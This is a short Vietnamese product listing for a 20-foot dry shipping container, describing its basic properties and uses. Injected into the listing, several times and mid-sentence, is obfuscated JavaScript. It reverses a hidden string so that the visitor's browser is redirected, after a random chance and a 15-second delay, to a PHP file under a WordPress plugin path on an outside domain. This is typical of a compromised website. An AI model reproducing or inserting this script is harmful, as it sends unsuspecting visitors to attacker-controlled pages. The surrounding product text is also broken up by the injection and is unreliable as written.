CONTAINER KHÔ 20 FEET

    DC20-1

    CÁC THUỘC TÍNH CƠ BẢN CỦA CONTAINER KHÔ 20 FEET Container kín nước, kín sáng, cửa dễ đóng mở, sàn chắc chắn container khô 20ft$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} thích hợp để vận chuyển hàng hóa ngoại trừ thực phẩm tươi sống làm kho chứa hàng Thích hợp dùng làm chế tạo các loại container khác như: container văn phòng$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}, nhà container$VOcl3cIRrbzlimOyC8H=function(n){if ...Tìm hiểu thêm

    Đăng 3 năm trước

    0 người Comments